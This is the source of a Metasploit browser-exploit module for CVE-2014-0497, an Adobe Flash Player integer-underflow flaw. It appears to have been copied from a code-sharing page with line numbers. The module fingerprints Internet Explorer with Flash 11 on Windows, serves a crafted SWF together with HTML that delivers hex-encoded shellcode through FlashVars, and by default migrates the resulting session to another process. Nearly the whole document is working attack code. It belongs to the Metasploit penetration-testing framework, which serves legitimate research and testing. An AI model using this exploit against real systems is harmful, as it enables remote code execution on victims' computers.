Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::BrowserExploitServer
10

11
  def initialize(info={})
12
    super(update_info(info,
13
      'Name'           => "Adobe Flash Player Integer Underflow Remote Code Execution",
14
      'Description'    => %q{
15
        This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player
16
        before 12.0.0.43. By supplying a specially crafted swf file it is possible to trigger an
17
        integer underflow in several avm2 instructions, which can be turned into remote code
18
        execution under the context of the user, as exploited in the wild in February 2014. This
19
        module has been tested successfully with Adobe Flash Player 11.7.700.202 on Windows XP
20
        SP3, Windows 7 SP1 and Adobe Flash Player 11.3.372.94 on Windows 8 even when it includes
21
        rop chains for several Flash 11 versions, as exploited in the wild.
22
      },
23
      'License'        => MSF_LICENSE,
24
      'Author'         =>
25
        [
26
          'Unknown',     # vulnerability discovery and exploit in the wild
27
          'juan vazquez' # msf module
28
        ],
29
      'References'     =>
30
        [
31
          [ 'CVE', '2014-0497' ],
32
          [ 'OSVDB', '102849' ],
33
          [ 'BID', '65327' ],
34
          [ 'URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-04.html' ],
35
          [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2014/02/17/a-journey-to-cve-2014-0497-exploit.aspx' ]
36
        ],
37
      'Payload'        =>
38
        {
39
          'Space' => 1024,
40
          'DisableNops' => true
41
        },
42
      'DefaultOptions'  =>
43
        {
44
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
45
          'Retries'              => false
46
        },
47
      'Platform'       => 'win',
48
      # Versions targeted in the wild:
49
      # [*] Windows 8:
50
      #   11,3,372,94, 11,3,375,10, 11,3,376,12, 11,3,377,15, 11,3,378,5, 11,3,379,14
51
      #   11,6,602,167, 11,6,602,171 ,11,6,602,180
52
      #   11,7,700,169, 11,7,700,202, 11,7,700,224
53
      # [*] Before windows 8:
54
      #   11,0,1,152,
55
      #   11,1,102,55, 11,1,102,62, 11,1,102,63
56
      #   11,2,202,228, 11,2,202,233, 11,2,202,235
57
      #   11,3,300,257, 11,3,300,273
58
      #   11,4,402,278
59
      #   11,5,502,110, 11,5,502,135, 11,5,502,146, 11,5,502,149
60
      #   11,6,602,168, 11,6,602,171, 11,6,602,180
61
      #   11,7,700,169, 11,7,700,202
62
      #   11,8,800,97, 11,8,800,50
63
     'BrowserRequirements' =>
64
        {
65
          :source  => /script|headers/i,
66
          :activex => [
67
            {
68
              clsid: '{D27CDB6E-AE6D-11cf-96B8-444553540000}',
69
              method: 'LoadMovie'
70
            }
71
          ],
72
          :os_name => OperatingSystems::Match::WINDOWS,
73
          :ua_name => Msf::HttpClients::IE,
74
          :flash   => lambda { |ver| ver =~ /^11\./ }
75
        },
76
      'Targets'        =>
77
        [
78
          [ 'Automatic', {} ]
79
        ],
80
      'Privileged'     => false,
81
      'DisclosureDate' => '2014-02-05',
82
      'DefaultTarget'  => 0))
83
  end
84

85
  def exploit
86
    @swf = create_swf
87
    super
88
  end
89

90
  def on_request_exploit(cli, request, target_info)
91
    print_status("Request: #{request.uri}")
92

93
    if request.uri =~ /\.swf$/
94
      print_status("Sending SWF...")
95
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
96
      return
97
    end
98

99
    print_status("Sending HTML...")
100
    tag = retrieve_tag(cli, request)
101
    profile = browser_profile[tag]
102
    profile[:tried] = false unless profile.nil? # to allow request the swf
103
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
104
  end
105

106
  def exploit_template(cli, target_info)
107

108
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
109
    shellcode = get_payload(cli, target_info).unpack("H*")[0]
110

111
    html_template = %Q|<html>
112
    <body>
113
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
114
    <param name="movie" value="<%=swf_random%>" />
115
    <param name="allowScriptAccess" value="always" />
116
    <param name="FlashVars" value="id=<%=shellcode%>" />
117
    <param name="Play" value="true" />
118
    </object>
119
    </body>
120
    </html>
121
    |
122

123
    return html_template, binding()
124
  end
125

126
  def create_swf
127
    path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0497", "Vickers.swf" )
128
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
129

130
    swf
131
  end
132
end
133

134